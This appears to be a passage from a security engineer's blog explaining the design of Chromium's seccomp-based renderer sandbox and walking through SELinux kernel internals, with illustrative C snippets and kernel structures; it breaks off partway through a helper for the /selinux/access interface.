I think what Chrome will end up doing is to anti-alias the clipping paths (correctly) for everything except <canvas>. This isn't a great solution, but it's better than what we have now.

Chromium's seccomp Sandbox

I wrote an article for LWN about Chromium's seccomp sandbox. They decided that it wasn't in the right style for LWN, and they rewrote it to fit. Their version has just become available for free. I'm including my version below:

The Chromium seccomp sandbox

As part of the process of porting Chromium to Linux, we had to decide how to implement Chromium's sandbox on Linux.

The Chromium sandbox is an important part of keeping users safe. The web is a very complicated place these days and the code to parse and interpret it is large and on the front-line of security. We try to make sure that this code is free of security bugs, but history suggests that we can't be perfect. So, we plan for the case where someone has an exploit against our rendering code and run it in its own process with limited authority. It's the sandbox's job to limit that authority as much as possible.

Chromium renderers need very little authority. They need access to fontconfig to find fonts on the system and to open those font files. However, these can be handled as IPC requests to the browser process. They do not need access to the X server (which is why we don't have GTK widgets on web pages), nor should they be able to access DBus, which is increasingly powerful these days.

Drawing is handled using SysV shared memory (so that we can share memory directly with X). Everything else is either serialised over a socketpair or passed using a file descriptor to a tmpfs file. This means that we can deny filesystem access completely. The renderer requires no network access: the network stack is entirely within the browser process.

Traditional sandboxing schemes on Linux involve switching UIDs and using chroot. We'll be using some of those techniques too. But this text is about the most experimental part of our sandbox: the seccomp layer which my colleague Markus Gutschke has been writing.

The kernel provides a little-known feature whereby any process can enter ‘seccomp mode’. Once enabled it cannot be disabled. Any process running in seccomp mode can only make four system calls: read, write, sigreturn and exit. Attempting any other system call will result in the immediate termination of the process.

This is quite desirable for preventing attacks. It removes network access, which is traditionally difficult to limit otherwise (although CLONE_NEWNET might help here). It also limits access to new, possibly dangerous, system calls that we don't otherwise need like tee and vmsplice. Also, because read and write proceed at full speed, if we limit our use of other system calls, we can hope to have a minimal performance overhead.
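To see the kill-on-forbidden-call behaviour for yourself, here is a small Linux-only sketch. It is not taken from the Chromium sandbox; the function name is invented, and it assumes a kernel built with seccomp support. A child process enters seccomp mode via prctl and then tries getpid, which is not one of the four permitted calls.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <linux/seccomp.h>
#include <signal.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/*
 * Forks a child that enters strict seccomp mode and then attempts a
 * forbidden system call. Returns the number of the signal that killed
 * the child, or -1 if fork failed, seccomp was unavailable, or the
 * child was not killed by a signal.
 */
int seccomp_forbidden_syscall_signal(void) {
    pid_t pid = fork();
    if (pid < 0) {
        return -1;
    }
    if (pid == 0) {
        if (prctl(PR_SET_SECCOMP, SECCOMP_MODE_STRICT) != 0) {
            _exit(2); /* could not enter seccomp mode */
        }
        syscall(SYS_getpid);  /* forbidden: the kernel kills us here */
        syscall(SYS_exit, 0); /* only reached if we were not killed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) {
        return -1;
    }
    return WIFSIGNALED(status) ? WTERMSIG(status) : -1;
}
```

On a kernel with seccomp enabled I would expect this to return SIGKILL. Note that the child uses the raw exit system call as its fallback: glibc's _exit normally uses exit_group, which is itself forbidden in this mode.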

But we do need to support some other system calls. Allocating memory is certainly very useful. The traditional way to support this would be to RPC to a trusted helper process which could validate and perform the needed actions. However, a different process cannot allocate memory on our behalf. In order to affect the address space of the sandboxed code, the trusted code would have to be inside the process!

So that's what we do: each untrusted thread has a trusted helper thread running in the same process. This certainly presents a fairly hostile environment for the trusted code to run in. For one, it can only trust its CPU registers - all memory must be assumed to be hostile. Since C code will spill to the stack when needed and may pass arguments on the stack, all the code for the trusted thread has to be carefully written in assembly.

The trusted thread can receive requests to make system calls from the untrusted thread over a socket pair, validate the system call number and perform them on its behalf. We can stop the untrusted thread from breaking out by only using CPU registers and by refusing to let the untrusted code manipulate the VM in unsafe ways with mmap, mprotect etc.

That could work, if only the untrusted code would make RPCs rather than system calls. Our renderer code is very large however. We couldn't patch every call site and, even if we could, our upstream libraries don't want those patches. Alternatively, we could try and intercept at dynamic linking time, assuming that all the system calls are via glibc. Even if that were true, glibc's functions make system calls directly, so we would have to patch at the level of functions like printf rather than write.

This would seem to be a very tough problem, but keep in mind that if we miss a call site, it's not a security issue: the kernel will kill us. It's just a crash bug. So we could use a theoretically incorrect solution so long as it actually worked in practice. And this is what we do:

At startup we haven't processed any untrusted input, so we assume that the program is uncompromised. Now we can disassemble our own memory, find sites where we make system calls and patch them. Correctly parsing x86 machine code is very tough. Native Client uses a customised compiler which only generates a subset of x86 in order to do it. But we don't need a perfect disassembler so long as it works in practice for the code that we have. It turns out that a simple disassembler does the job perfectly well with only a very few corner cases.

Now that we have patched all the call sites to call our RPC wrapper, instead of the kernel, we are almost done. We have only to consider system calls which pass arguments in memory. Because the untrusted code can modify any memory that the trusted code can, the trusted code couldn't validate calls like open. It could verify the filename being requested but the untrusted code could change the filename before the kernel copied the string from user-space.

For these cases, we also have a single trusted process. This trusted process shares a couple of pages of memory with each of the trusted threads. When the trusted thread is asked to make a system call which it cannot safely validate, it forwards the call to the trusted process. Since the trusted process has a different address space, it can safely validate the arguments without interference. It then copies the validated arguments into the shared memory pages. These memory pages are writable by the trusted process, but read-only in the sandboxed process. Thus the untrusted code cannot modify them and the trusted code can safely make the system call using the validated, read-only arguments.

We also use this trick for system calls like mmap which don't take arguments in memory, but are complicated to verify. Recall that the trusted thread has to be hand written in assembly so we try to minimise the amount of this code where possible.

Once we have this scheme in place we can intercept, examine and deny any system calls. We start off denying everything and then, slowly, add system calls that we need. For each system call we need to consider the security implications it might have. Calls like getpid are easy, but what damage could one do with mmap/munmap? Well, the untrusted code could replace the code which the trusted threads are running for one! So, when a call might be dangerous we allow only a minimal, and carefully examined, subset of flags which match the uses that we actually have in our code.

We'll be layering this sandbox with some more traditional UNIX sandboxing techniques in the final design. However, you can get a preview of the code in its incomplete state already at its Google Code homepage.

There's still much work to be done. A given renderer could load a web page with an iframe to any domain. Those iframes are handled in the same renderer, thus a compromised renderer can ask the browser for any of the user's cookies. Microsoft Research developed Gazelle, which has much stricter controls on a renderer, at the expense of web-compatibility. We know that users won't accept browsers that don't work with their favourite websites, but we are also very jealous of Gazelle's security properties so hopefully we can improve Chromium along those lines in the future.

Another weak spot is installed plugins. Plugin support on Linux is very new but on Windows, at least, we don't sandbox plugins. They don't expect to be sandboxed and we hurt web-compatibility (and break their auto-updating) if we limit them. That means that plugins are a vector for more serious attacks against web browsers. As ever, keep up to date with the latest security patches!

DNSCurve Internet Draft

Matthew has posted an Internet draft for DNSCurve. DNSCurve is a way of securing DNS which isn't DNSSEC. See Dan's talk from a couple of weeks ago about why DNSCurve is the better answer.

DEFCON 17

I'll be going to DEFCON this year. Ping me if you'll be around.

SELinux from the inside out

There are some great sources of information for users and sysadmins about SELinux [1] [2] but your author has always preferred to understand a system from the bottom-up and, in this regard, found the information somewhat lacking. This document is a guide to the internals of SELinux by starting at the kernel source and working outwards.

We'll be drawing on three different sources in order to write this document.

Access vectors

SELinux is fundamentally about answering questions of the form “May x do y to z?” and enforcing the result. Although the nature of the subject and object can be complex, they all boil down to security identifiers (SIDs), which are unsigned 32-bit integers.

The action boils down to a class and a permission. Each class can have up to 32 permissions (because they are stored as a bitmask in a 32-bit int). Examples of classes are FILE, TCP_SOCKET and X_EVENT. For the FILE class, some examples of permissions are READ, WRITE, LOCK etc.
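Since the permissions of a class fit in a single 32-bit word, checking a request against the allowed set is one mask operation. Here's a minimal sketch; the EX_ constants are invented for illustration and are not the values from av_permissions.h.

```c
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical permission bits for a FILE-like class. */
enum {
    EX_FILE_READ  = 1u << 0,
    EX_FILE_WRITE = 1u << 1,
    EX_FILE_LOCK  = 1u << 2
};

/* True only if every requested permission bit is also set in allowed. */
bool perms_granted(uint32_t allowed, uint32_t requested) {
    return (requested & ~allowed) == 0;
}
```

So a subject allowed EX_FILE_READ | EX_FILE_WRITE may read, but a request for EX_FILE_READ | EX_FILE_LOCK fails because one of the requested bits is missing.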

At the time of writing there are 73 different classes (selinux/libselinux/include/selinux/flask.h) and 1025 different permissions (.../av_permissions.h).

The security policy of a system can be thought of as a table, with subjects running down the left edge, objects across the top and, in each cell, the set of actions which that subject can perform on that object.

This is reflected in the first part of the SELinux code that we'll look at: the access vector cache (security/selinux/avc.c). The AVC is a hash map from (subject, object, class) to the bitset of permissions allowed:

struct avc_entry {
        u32                     ssid;    // subject SID
        u32                     tsid;    // object SID
        u16                     tclass;  // class
        struct av_decision      avd;     // contains the set of permissions for that class
};
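To make the shape of that lookup concrete, here is a toy user-space cache keyed on the same triple. It's a sketch only: every ex_ name is made up, the hash function is an arbitrary choice, and it simply evicts on a collision rather than doing anything cleverer.

```c
#include <stdbool.h>
#include <stdint.h>

#define EX_AVC_SLOTS 64

struct ex_avc_slot {
    bool     used;
    uint32_t ssid;    /* subject SID */
    uint32_t tsid;    /* object SID */
    uint16_t tclass;  /* class */
    uint32_t allowed; /* bitset of permissions for that class */
};

struct ex_avc {
    struct ex_avc_slot slots[EX_AVC_SLOTS];
};

/* Mixes the three key fields into a slot index. */
unsigned ex_avc_hash(uint32_t ssid, uint32_t tsid, uint16_t tclass) {
    return (ssid ^ (tsid << 2) ^ ((uint32_t)tclass << 4)) % EX_AVC_SLOTS;
}

/* Stores a decision, overwriting whatever occupied the slot before. */
void ex_avc_insert(struct ex_avc *c, uint32_t ssid, uint32_t tsid,
                   uint16_t tclass, uint32_t allowed) {
    struct ex_avc_slot *s = &c->slots[ex_avc_hash(ssid, tsid, tclass)];
    s->used = true;
    s->ssid = ssid;
    s->tsid = tsid;
    s->tclass = tclass;
    s->allowed = allowed;
}

/* Returns true on a hit and writes the cached bitset to *allowed. */
bool ex_avc_lookup(const struct ex_avc *c, uint32_t ssid, uint32_t tsid,
                   uint16_t tclass, uint32_t *allowed) {
    const struct ex_avc_slot *s = &c->slots[ex_avc_hash(ssid, tsid, tclass)];
    if (!s->used || s->ssid != ssid || s->tsid != tsid || s->tclass != tclass) {
        return false; /* miss: the caller must ask elsewhere */
    }
    *allowed = s->allowed;
    return true;
}
```

A miss here corresponds to the case where the real cache has no answer and something else has to compute the decision.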

The AVC is queried when the kernel needs to make security decisions. SELinux hooks into the kernel using the LSM hooks and is called whenever the kernel is about to perform an action which needs a security check. Consider the getpgid system call to get the current process group ID. When SELinux is built into a kernel, this ends up calling the following hook function (security/selinux/hooks.c):

static int selinux_task_getpgid(struct task_struct *p)
{
        return current_has_perm(p, PROCESS__GETPGID);
}

static int current_has_perm(const struct task_struct *tsk,
                            u32 perms)
{
        u32 sid, tsid;

        sid = current_sid();
        tsid = task_sid(tsk);
        return avc_has_perm(sid, tsid, SECCLASS_PROCESS, perms, NULL);
}

Referring back to the table concept: in order to check if a process with SID x may call getpgid we find x across and x down and check that SECCLASS_PROCESS:PROCESS__GETPGID is in the set of allowed actions.

So now we have to discover what the AVC is actually caching, and where these SIDs are coming from. We'll tackle the latter question first.

SIDs and Security Contexts

SIDs turn out to be much like interned symbols in some languages. Rather than keeping track of complex objects and spending time comparing them during lookups, they are reduced to an identifier via a table. SIDs are the interned identifiers of security contexts. The sidtab maps from one to the other (security/selinux/ss/sidtab.h):

struct sidtab {
        struct sidtab_node **htable;
        unsigned int nel;       /* number of elements */
        unsigned int next_sid;  /* next SID to allocate */
        unsigned char shutdown;
        spinlock_t lock;
};

struct sidtab_node {
        u32 sid;                       /* security identifier */
        struct context context;        /* security context structure */
        struct sidtab_node *next;
};

The SID table is optimised for mapping from SIDs to security contexts. Mapping the other way involves walking the whole hash table.
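The asymmetry between the two directions is easy to see in a toy version. This sketch is not the kernel's sidtab: it uses a flat array instead of a hash table, represents a context as a string rather than a struct context, and all of the ex_ names are invented.

```c
#include <stdint.h>
#include <string.h>

#define EX_MAX_SIDS 16

struct ex_sidtab {
    const char *contexts[EX_MAX_SIDS]; /* entry i holds the context for SID i + 1 */
    uint32_t    count;                 /* number of SIDs allocated so far */
};

/* SID -> context: a direct index. Returns NULL for an unknown SID. */
const char *ex_sid_to_context(const struct ex_sidtab *t, uint32_t sid) {
    if (sid == 0 || sid > t->count) {
        return NULL;
    }
    return t->contexts[sid - 1];
}

/*
 * Context -> SID: walks every entry looking for a match and allocates a
 * new SID if there is none. Returns 0 if the table is full. The caller
 * must keep the string alive, since only the pointer is stored.
 */
uint32_t ex_context_to_sid(struct ex_sidtab *t, const char *context) {
    for (uint32_t i = 0; i < t->count; i++) {
        if (strcmp(t->contexts[i], context) == 0) {
            return i + 1;
        }
    }
    if (t->count == EX_MAX_SIDS) {
        return 0;
    }
    t->contexts[t->count] = context;
    t->count++;
    return t->count;
}
```

Interning the same context twice yields the same SID, which is what lets later comparisons be done on integers alone.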

The structure for the security context is probably familiar to you if you have worked with SELinux before (security/selinux/ss/context.h):

struct context {
        u32 user;
        u32 role;
        u32 type;
        u32 len;        /* length of string in bytes */
        struct mls_range range;
        char *str;        /* string representation if context cannot be mapped. */
};

If you have an SELinux enabled system, you can look at your current security context with id -Z. Running that will produce something like unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023. This string splits into four parts:

  1. The SELinux “user”: unconfined_u
  2. The role: unconfined_r
  3. The type: unconfined_t (we'll mostly be concentrating on types)
  4. The multi-level-security (MLS) sensitivity and compartments: s0-s0:c0.c1023

(You might notice that the parts are broken up with colons, but that the MLS part can contain colons too! Obviously, this is the only part that can contain colons to avoid ambiguity.)
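Because only the last part may contain colons, a context string can be split by cutting at the first three colons and treating the remainder as the MLS part. Here's a rough sketch of that; the struct, the buffer sizes and the function names are my own, and it assumes that all four parts are present.

```c
#include <stddef.h>
#include <string.h>

struct ex_context_parts {
    char user[64];
    char role[64];
    char type[64];
    char mls[128];
};

/* Copies len bytes into dst as a string. Fails if empty or too long. */
int ex_copy_field(char *dst, size_t dst_size, const char *start, size_t len) {
    if (len == 0 || len >= dst_size) {
        return -1;
    }
    memcpy(dst, start, len);
    dst[len] = '\0';
    return 0;
}

/* Splits "user:role:type:mls" at the first three colons. 0 on success. */
int ex_parse_context(const char *s, struct ex_context_parts *out) {
    const char *c1 = strchr(s, ':');
    const char *c2 = c1 ? strchr(c1 + 1, ':') : NULL;
    const char *c3 = c2 ? strchr(c2 + 1, ':') : NULL;
    if (c3 == NULL) {
        return -1; /* fewer than four parts */
    }
    if (ex_copy_field(out->user, sizeof out->user, s, (size_t)(c1 - s)) != 0 ||
        ex_copy_field(out->role, sizeof out->role, c1 + 1, (size_t)(c2 - c1 - 1)) != 0 ||
        ex_copy_field(out->type, sizeof out->type, c2 + 1, (size_t)(c3 - c2 - 1)) != 0) {
        return -1;
    }
    /* Everything after the third colon is the MLS part, colons and all. */
    return ex_copy_field(out->mls, sizeof out->mls, c3 + 1, strlen(c3 + 1));
}
```

Given the example string above, the MLS field comes out as s0-s0:c0.c1023 with its internal colon intact.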

When the system's security policy is compiled, these names are mapped to IDs. It's these IDs which end up in the kernel's context structure. Also notice that, by convention, types end in _t, roles with _r and users with _u. Don't confuse UNIX users with SELinux users; they are separate namespaces. For a sense of scale, on a Fedora 11 box, the default policy includes 8 users, 11 roles and 2727 types.

The Security Server

We now address the question of what it is that the access vector cache is actually caching. When a question is asked of the AVC to which it doesn't have an answer, it falls back on the security server. The security server is responsible for interpreting the policy from userspace. The code lives in context_struct_compute_av (in security/selinux/ss/services.c). We'll walk through its logic (and we'll expand on each of these points below):

  1. The subject and object's type are used to index type_attr_map, which results in a set of types for each of them.
  2. We consider the Cartesian product of the two sets and build up a 32-bit allowed bit-vector based on the union of the permissions in the access vector table for each (subject, object) pair.
  3. For each pair in the product, we also include the union of permissions from a second access vector table: the conditional access vector table.
  4. The target type is used to index an array and from that we get a linked list of “constraints”. Each constraint contains byte code for a stack based virtual machine and can limit the granted permissions.
  5. If the resulting set of permissions includes role transition, then we walk a linked list of allowed role transitions. If the transition isn't whitelisted, those permissions are removed.
  6. If either the subject or object's type is ‘bounded’, then we recurse and check the permissions of the bounded types. We verify that the resulting permissions are a subset of the permissions enjoyed by types that they are bounded by. This should be statically enforced by the tool which produced the policy so, if we find a violation, it's logged and the resulting permissions are clipped.
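The first two steps can be sketched in a few lines. This is a simplification under loud assumptions: there are only eight types, each entry of the attribute map is a small bitset, the access vector table is a dense array for a single class, and none of the ex_ names exist in the kernel.

```c
#include <stdint.h>

#define EX_NTYPES 8

struct ex_policy {
    /* type_attr_map[t]: bitset containing t and each attribute that t carries. */
    uint8_t  type_attr_map[EX_NTYPES];
    /* avtab[s][t]: permissions granted to source s on target t (one class). */
    uint32_t avtab[EX_NTYPES][EX_NTYPES];
};

/*
 * Steps 1 and 2: expand both types through the attribute map, then take
 * the union of the permissions for every (source, target) pair in the
 * Cartesian product of the two sets.
 */
uint32_t ex_compute_allowed(const struct ex_policy *p,
                            unsigned stype, unsigned ttype) {
    uint32_t allowed = 0;
    for (unsigned i = 0; i < EX_NTYPES; i++) {
        if (!(p->type_attr_map[stype] & (1u << i))) {
            continue;
        }
        for (unsigned j = 0; j < EX_NTYPES; j++) {
            if (!(p->type_attr_map[ttype] & (1u << j))) {
                continue;
            }
            allowed |= p->avtab[i][j];
        }
    }
    return allowed;
}
```

If type 0 carries attribute 2 and type 1 carries attribute 3, then a rule written against (2, 3) contributes to the result for (0, 1) just as a rule written directly against (0, 1) does.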

Now, dealing with each of those steps in more detail:

Type attributes

Type attributes are discussed in the Configuring the SELinux Policy report. They are used for grouping types together: by including a type attribute on a new type, the new type inherits all the permissions granted to the type attribute. As can be seen from the description above, type attributes are implemented as types themselves.

These attributes could have been statically expanded by the tool which generated the policy file. Expanding at generation time is a time/space tradeoff and the SELinux developers opted for the smaller policy file.

It's also worth noting that type_attr_map isn't expanded recursively: one can only have one level of type attributes.

Type attributes conventionally end in _type (as opposed to types, which end in _t). In the Fedora 11 policy, here are the top five type attributes:

Name of type attribute     Number of types with that attribute
file_type                  1406
non_security_file_type     1401
exec_type                  484
entry_type                 478
domain                     442

The graph of types and type attributes is, as expected, bipartite.

The conditional access vector table

The conditional access vector table contains permissions just like the regular access vector table except that each, optionally, has an extra flag: AV_ENABLED (security/selinux/avtab.h). This flag can be enabled and disabled at run time by changing the value of ‘booleans’. These booleans are quite well covered by the higher-level documentation for the policy language (here and here).

The set of booleans can be found in /selinux/booleans (if you are running SELinux). They can be read without special authority although you should be aware of a bug: trying to read more than a page from one of those files results in -EINVAL and recent coreutils binaries (like cat) use a buffer size of 32K. Instead you can use dd, or just run the friendly tool: semanage boolean -l.

The AV_ENABLED flag is updated when a boolean is changed. The conditional access vector table is populated by a list of cond_node structures (security/selinux/conditional.h). These contain bytecode for a limited, stack-based machine and two lists of access vectors which should be enabled or disabled in the case that the machine returns true or false.

The stack machine can read any of the configured booleans and combine them with standard boolean algebra, returning a single bit result.
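A machine like this is small enough to sketch in full. The opcodes and structures below are hypothetical and are not the kernel's encoding; the point is only to show postfix evaluation of boolean expressions over a set of named booleans.

```c
#include <stddef.h>

enum ex_op { EX_BOOL, EX_NOT, EX_AND, EX_OR, EX_XOR };

struct ex_insn {
    enum ex_op op;
    unsigned   index; /* which boolean to push; used by EX_BOOL only */
};

#define EX_STACK_DEPTH 8

/*
 * Evaluates a postfix program over the given booleans.
 * Returns 0 or 1, or -1 if the program is malformed.
 */
int ex_cond_eval(const struct ex_insn *prog, size_t n,
                 const int *bools, size_t nbools) {
    int stack[EX_STACK_DEPTH];
    int sp = 0;

    for (size_t i = 0; i < n; i++) {
        switch (prog[i].op) {
        case EX_BOOL:
            if (sp == EX_STACK_DEPTH || prog[i].index >= nbools) {
                return -1;
            }
            stack[sp++] = bools[prog[i].index] != 0;
            break;
        case EX_NOT:
            if (sp < 1) {
                return -1;
            }
            stack[sp - 1] = !stack[sp - 1];
            break;
        case EX_AND:
        case EX_OR:
        case EX_XOR: {
            if (sp < 2) {
                return -1;
            }
            int b = stack[--sp];
            int a = stack[sp - 1];
            if (prog[i].op == EX_AND) {
                stack[sp - 1] = a && b;
            } else if (prog[i].op == EX_OR) {
                stack[sp - 1] = a || b;
            } else {
                stack[sp - 1] = a != b;
            }
            break;
        }
        default:
            return -1;
        }
    }
    /* A well-formed program leaves exactly one value: the result. */
    return sp == 1 ? stack[0] : -1;
}
```

The expression "boolean 0 and not boolean 1" would be encoded as the four instructions BOOL 0, BOOL 1, NOT, AND.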

Constraints

One of the parts of the SELinux policy language is the ability to define constraints. Constraints are defined using the neverallow command. Constraints are used to prevent people from writing bad policy, or in the case of MLS, to enforce rules governing information flow. http://danwalsh.livejournal.com/12333.html

As you can see if you read the above linked blog post, constraints are statically enforced by the policy tools where possible and also checked by the kernel. Constraints are evaluated by running a stack-machine bytecode. (This is a different machine than that which is used for the conditional access vector table.) Based on the kernel code for the stack-machine, we can write a simple disassembler and see what constraints are enforced in the kernel.

In the Fedora 11 policy, 32 classes have constraints applied to them. Let's have a look at some of them. Here's the first one:

constraint for class 'process' permissions:800000:
  DYNTRANSITION
subject.user == object.user?
subject.role == object.role?
and

Roughly translated, this means “Whenever operating on an object of class process, the DYNTRANSITION permission is forbidden unless the user and role of the subject and object match”. A DYNTRANSITION (dynamic transition) is when a process switches security contexts without execing a binary. Think of it like a setuid call for security contexts (we'll cover how to perform this later).

Here's another constraint, a longer one this time:

constraint for class 'file' permissions:188:
  CREATE
  RELABELFROM
  RELABELTO
subject.user == object.user?
[bootloader_t, devicekit_power_t, logrotate_t, ldconfig_t, unconfined_cronjob_t, unconfined_sendmail_t, setfiles_mac_t,
initrc_t, sysadm_t, ada_t, fsadm_t, kudzu_t, lvm_t, mdadm_t, mono_t, rpm_t, wine_t, xdm_t, unconfined_mount_t,
oddjob_mkhomedir_t, saslauthd_t, krb5kdc_t, newrole_t, prelink_t, anaconda_t, local_login_t, rpm_script_t,
sysadm_passwd_t, system_cronjob_t, tmpreaper_t, samba_unconfined_net_t, unconfined_notrans_t, unconfined_execmem_t,
devicekit_disk_t, firstboot_t, samba_unconfined_script_t, unconfined_java_t, unconfined_mono_t,
httpd_unconfined_script_t, groupadd_t, depmod_t, insmod_t, kernel_t, kpropd_t, livecd_t, oddjob_t, passwd_t, apmd_t,
chfn_t, clvmd_t, crond_t, ftpd_t, inetd_t, init_t, rshd_t, sshd_t, staff_t, udev_t, virtd_t, xend_t, devicekit_t,
remote_login_t, inetd_child_t, qemu_unconfined_t, restorecond_t, setfiles_t, unconfined_t, kadmind_t,
ricci_modcluster_t, rlogind_t, sulogin_t, yppasswdd_t, telnetd_t, useradd_t, xserver_t] contains subject.type?
or

This means that when you create a file or change its security context, either the SELinux user of the file has to match your current SELinux user, or you have to be one of a list of privileged types.

One last example foreshadows several large subjects: user-land object managers and multi-level security. For now I'll leave it undiscussed to whet your appetite.

constraint for class 'db_database' permissions:7de:
  DROP
  GETATTR
  SETATTR
  RELABELFROM
  ACCESS
  INSTALL_MODULE
  LOAD_MODULE
  GET_PARAM
  SET_PARAM
object.sensitivity[high] dominates type?

Roles and users

In step 5, above, we mention ‘role transitions’, so we should probably discuss SELinux users and roles. Keep in mind that SELinux users are separate from normal UNIX users.

Each type inhabits some set of roles and each role inhabits some set of SELinux users. UNIX users are mapped to SELinux users at login time (run `semanage login -l`) and so each user has some set of roles that they may operate under. Like the standard custom of administrating a system by logging in as a normal user and using sudo only for the tasks which need root privilege, roles are designed for the same purpose. Although a given physical user may need to perform administrative tasks, they probably don't want to have that power all the time. If they did, then there would be a confused deputy problem when they perform what should be an unprivileged task which does far more than intended because they performed it with excess authority.

Here's the graph of users and roles in the Fedora 11 targeted policy:

An SELinux user can move between roles with the newrole command, if such a role transition is permitted. Here's the graph of permitted role transitions in the Fedora policy:

With the targeted policy at least, roles and users play a relatively small part in SELinux and we won't cover them again.

Bounded types

A type in SELinux may be “bounded” to another type. This means that the bounded type's permissions are a strict subset of the parent and here we find the beginnings of a type hierarchy. The code for enforcing this originally existed only in the user-space tools which build the policy, but recently it was directly integrated into the kernel.

In the future, this will make it possible for a lesser privileged process to safely carve out subsets of policy underneath the administratively-defined policy. At the time of writing, this functionality has yet to be integrated in any shipping distribution.

(Thanks to Stephen Smalley for clearing up this section.)

The SELinux filesystem

The kernel mostly communicates with userspace via filesystems. There's both the SELinux filesystem (usually mounted at /selinux) and the standard proc filesystem. Here we'll run down some of the various SELinux specific entries in each.

But first, a quick note. Several of the entries are described as ‘transaction’ files. This means that you must open them, perform a single write and then a single read to get the result. You must use the same file descriptor for both (so, no echo, cat pairs in shell scripts).
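In C, that open, write, read sequence looks roughly like this. It's a sketch rather than anything from libselinux: the function name is made up and error handling is kept to the bare minimum.

```c
#include <fcntl.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Performs one transaction: a single write of the request followed by a
 * single read of the reply, both on the same file descriptor. Returns
 * the number of bytes read (the reply is NUL-terminated), or -1.
 */
ssize_t ex_transact(const char *path, const char *request,
                    char *response, size_t response_size) {
    if (response_size == 0) {
        return -1;
    }
    int fd = open(path, O_RDWR);
    if (fd < 0) {
        return -1;
    }
    ssize_t n = -1;
    size_t len = strlen(request);
    if (write(fd, request, len) == (ssize_t)len) {
        n = read(fd, response, response_size - 1);
        if (n >= 0) {
            response[n] = '\0';
        }
    }
    close(fd);
    return n;
}
```

On an SELinux system one might call it as ex_transact("/selinux/context", "unconfined_u:unconfined_r:unconfined_t:s0", buf, sizeof buf) to exercise the context file described below.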

/selinux/enforcing

A boolean file which specifies if the system is in ‘enforcing’ mode. If so, SELinux permissions checks are enforced. Otherwise, they only cause audit messages.

(Read: unprivileged. Write: requires root, SECURITY:SETENFORCE and that the kernel be built with CONFIG_SECURITY_SELINUX_DEVELOP.)

/selinux/disable

A write only, boolean file which causes SELinux to be disabled. The LSM hooks are reset, the SELinux filesystem is unregistered etc. SELinux can only be disabled once and probably doesn't leave your kernel in the best of states.

(Read: unsupported. Write: requires root, and that the kernel be built with CONFIG_SECURITY_SELINUX_DISABLE.)

/selinux/policyvers

A read only file which contains the version of the current policy. The version of a policy is contained in the binary policy file and the kernel contains logic to deal with older policy versions, should the version number in the file suggest that it's needed.

(Read: unprivileged. Write: unsupported.)

/selinux/load

A write only file which is used to load policies into the kernel. Loading a new policy triggers a global AVC invalidation.

(Read: unsupported. Write: requires root and SECURITY:LOAD_POLICY.)

/selinux/context

A transaction file. One writes a security context string and then reads the resulting, canonicalised context. The context is canonicalised by running it via the sidtab.

(Read/Write: unprivileged.)

/selinux/checkreqprot

A boolean file which determines which permissions are checked for mmap and mprotect calls. In certain cases the kernel can actually grant a process more access than it requests with these calls. (For example, if a shared library is marked as needing an executable stack, then the kernel may add the PROT_EXEC permission if the process didn't request it.)

If the value of this boolean is 1, then SELinux checks the permissions requested by the process. If 0, it checks the permissions which the process will actually receive.

(Read: unprivileged. Write: requires root, and SECURITY:SETCHECKREQPROT.)

/selinux/access

A transaction file which allows a user-space process to query the access vector table. This is the basis of user-space object managers.

The write phase consists of a string of the following form: ${subject security context (string)} ${object security context (string)} ${class (uint16_t, base 10)} ${requested permissions (uint32_t bitmap, base 16)}.

The read phase results in a string with this format: ${allowed permissions (uint32_t bitmap, base 16)} 0xffffffff ${audit allow (uint32_t bitmap, base 16)} ${audit deny (uint32_t bitmap, base 16)} ${sequence number (uint32_t, base 10)} ${flags (uint32_t, base 16)}.
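Going by the two formats just described, building a request and picking apart a reply is a job for snprintf and sscanf. This is a sketch based only on the description above; the struct and function names are invented, and I've assumed the bitmaps are written without any prefix.

```c
#include <inttypes.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

struct ex_av_reply {
    uint32_t allowed;
    uint32_t auditallow;
    uint32_t auditdeny;
    uint32_t seqno;
    uint32_t flags;
};

/* Formats the write phase. Returns the length, or -1 if it didn't fit. */
int ex_format_access_request(char *buf, size_t size,
                             const char *scon, const char *tcon,
                             uint16_t tclass, uint32_t requested) {
    int n = snprintf(buf, size, "%s %s %" PRIu16 " %" PRIx32,
                     scon, tcon, tclass, requested);
    return (n < 0 || (size_t)n >= size) ? -1 : n;
}

/* Parses the read phase. Returns 0 on success, -1 on a malformed reply. */
int ex_parse_access_reply(const char *reply, struct ex_av_reply *out) {
    uint32_t ignored; /* the constant second field */
    int n = sscanf(reply,
                   "%" SCNx32 " %" SCNx32 " %" SCNx32 " %" SCNx32
                   " %" SCNu32 " %" SCNx32,
                   &out->allowed, &ignored, &out->auditallow,
                   &out->auditdeny, &out->seqno, &out->flags);
    return n == 6 ? 0 : -1;
}
```

The request string would be written to /selinux/access and the reply read back from the same file descriptor, since it is a transaction file.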

This call will be covered in greater detail in the User-space Object Managers section, below.

(Read/Write: SECURITY:COMPUTE_AV.)
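As a rough sketch of the two phases described above, the following C helpers build the write-phase string and pick apart the read-phase string. The names format_access_query, parse_access_reply and struct access_reply are my own inventions for illustration and are not part of libselinux. The parser treats the trailing flags field as optional, on the assumption that some kernels omit it.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Decoded read-phase reply (hypothetical struct, for illustration only). */
struct access_reply {
  uint32_t allowed;
  uint32_t decided;     /* the constant second field of the reply */
  uint32_t audit_allow;
  uint32_t audit_deny;
  uint32_t seqno;
  uint32_t flags;       /* left as zero when the kernel omits the field */
};

/* Builds "<subject> <object> <class, base 10> <requested, base 16>".
 * Returns the string length, or -1 if it did not fit in `out`. */
static int format_access_query(char *out, size_t outlen, const char *scon,
                               const char *tcon, uint16_t tclass,
                               uint32_t requested) {
  assert(out != NULL && scon != NULL && tcon != NULL);
  const int n = snprintf(out, outlen, "%s %s %u %08x", scon, tcon,
                         (unsigned)tclass, (unsigned)requested);
  return (n < 0 || (size_t)n >= outlen) ? -1 : n;
}

/* Parses the reply string. Returns 0 on success, -1 on a malformed reply. */
static int parse_access_reply(const char *in, struct access_reply *r) {
  unsigned allowed, decided, audit_allow, audit_deny, seqno, flags = 0;
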